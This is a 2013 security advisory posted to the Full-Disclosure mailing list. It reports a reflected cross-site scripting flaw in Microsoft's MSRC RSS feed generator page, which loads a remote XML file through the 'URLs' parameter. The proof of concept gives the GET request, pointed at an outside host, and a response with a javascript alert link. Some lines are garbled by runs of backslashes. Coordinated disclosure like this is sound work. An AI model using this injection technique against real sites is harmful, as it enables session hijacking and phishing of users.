[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-08-29 19:03:12
Message-ID: 521F9AF0.9020603 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability
Date:
=====
2013-07-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1026
Microsoft Security Response Center (MSRC) ID: 15180
Video: http://www.vulnerability-lab.com/get_content.php?id=1028
View: http://www.youtube.com/watch?v=wcIIFB4Gx7g
VL-ID:
=====
1026
Common Vulnerability Scoring System:
====================================
1.6
Introduction:
=============
Microsoft Online Services is Microsoft`s hosted-software offering and a component of their \
software plus services strategy. Microsoft Online Services are hosted by Microsoft and sold \
`with` Microsoft partners. The suite includes Exchange Online, SharePoint Online, Office \
Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, \
the Software-plus-Services approach enables organizations to access the capabilities of \
enterprise software through on-premises servers, as online services, or a combination of both, \
depending on specific business requirements. Services also provide the option to add \
complementary capabilities that enhance on-premises server software and simplify system \
management and maintenance.
(Copy of the vendor Homepage: https://microsoftonline.com )
Abstract:
=========
An independent vulnerability laboratory researcher discovered a client-side cross site \
scripting vulnerability on Microsoft Website Application.
Report-Timeline:
================
2013-07-18: Researcher Notification & Coordination (Muhammad A.S.)
2013-07-19: Vendor Notification (Microsoft Security Response Center - MSRC)
2013-07-20: Vendor Response/Feedback (Microsoft Security Response Center - MSRC)
2013-07-26: Vendor Fix/Patch (Microsoft Development Team)
2013-07-28: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Microsoft Corporation
Product: Security Response Center (MSRC) - Blog aspx Web Application 2013 Q2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Low
Details:
========
It has been discovered that the file `ssfeedgenerator.aspx` is not validating the input \
parameters and hence is vulnerable to remote xss attacks. Since no validation is being \
performed, it is possible to include remote xml files to be parsed and displayed on the main \
microsoft website. A remote attacker can include malicious xml files via URLS variable which \
can lead to remote java-script execution on the client machine within the context of \
microsoft.com website.
The vulnerability is located in the \
rssfeedgenerator.aspx\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\" \
file and the vulnerable parameter is \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'URLs\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' \
which can be exploited via GET method to include remote (external) xml files.
Exploitation of the vulnerability requires no privilege application user account but low or \
medium user interaction. Successful exploitation of the vulnerability results in session \
hijacking, non persistent phishing, non persistent malware injects, external redirects and \
manipulation of affected module or application context.
Vulnerable Module(s):
[+] RSS Feeds
Vulnerable Path:
[+] /security/msrc/rssfeedgenerator.aspx
Vulnerable File(s):
[+] rssfeedgenerator.aspx
Vulnerable Parameter(s):
[+] URLs
Proof of Concept:
=================
The client side web vulnerability can be exploited by remote attackers without privilege \
application user account and with low user interaction. For demonstration or reproduce ...
GET /security/msrc/rssfeedgenerator.aspx?URLs=http://www.nybbletech.com/poc/ms/micro.xml&itemToDisplay=3&words=16 \
HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: v1st=58D7FEA59B237B40; MC1=GUID=376046a1d44f8b42834ba1809be0406d&HASH=a146&LV=20136
&V=4&LU=1371688854677; A=I&I=AxUFAAAAAACVBwAA4cYlXvROT/4qjCG/tr9eRg!!&V=4; \
WT_FPC=id=3513600256.30305614:lv=1373527230788:ss=1373527206515
Connection: keep-alive
Response:
INT NAV ONL PHY PRE PUR UNI"
X-AspNet-Version: 2.0.50727
VTag: 279923242400000000
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Fri, 19 Jul 2013 14:44:14 GMT
Content-Length: 1847
<div id="rssData1"><div><table width="100%" cellspacing="0" cellpadding="0" border="0" >
<tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx" \
target="_blank"> <b>Running in the wild, not for so long</b></a></td></tr><tr><td \
style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Wednesday, July \
10, 2013 5:12:00 PM</i></font></td></tr><tr><td style="padding-bottom:10px;"> Over <a \
href="javascript:alert('VULNERABLE')">CLICK HERE</a>testinging we received a report from our \
partners about a possible unpatched Internet Explorer vulnerability \
......</td></tr></table></div><div><table width="100%" cellspacing="0" cellpadding="0" \
border="0" ><tr><td><a \
href="http://blogs.technet.com/b/srd/archive/2013/07/09/assessing-risk-for-the-july-2013-security-updates.aspx" \
target="_blank"><b>Assessing risk for the July 2013 security updates</b></a></td></tr><tr><td \
style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Tuesday, July 9, \
2013 10:09:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">Today we released \
seven security bulletins addressing 34 CVE's. Six bulletins have a maximum severity rating of \
Critical, ...... </td></tr></table></div><div><table width="100%" cellspacing="0" \
cellpadding="0" border="0" ><tr><td> <a \
href="http://blogs.technet.com/b/srd/archive/2013/06/17/emet-4-0-now-available-for-download.aspx" \
target="_blank"> <b>EMET 4.0 now available for download</b></a></td></tr><tr><td \
style="padding-bottom:2px;"><font size="1"><i>Security Research & Defense - Monday, June 17, \
2013 10:01:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">We are pleased to \
announce that <strong>the final release of version 4.0 of the Enhanced Mitigation Experience \
Toolkit</strong>, ......</td></tr></table></div></div>
Solution:
=========
Input data via URLS parameter should be validated. Only white-listed domains should be allowed \
for redirects and direct links.
Risk:
=====
The security risk of the client side cross site scripting vulnerability in the microsoft \
security web application is estimated as low(+)|(-)medium.
Credits:
========
Muhammad Ahmed Siddiqui - ahmed@nybbletech.com
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic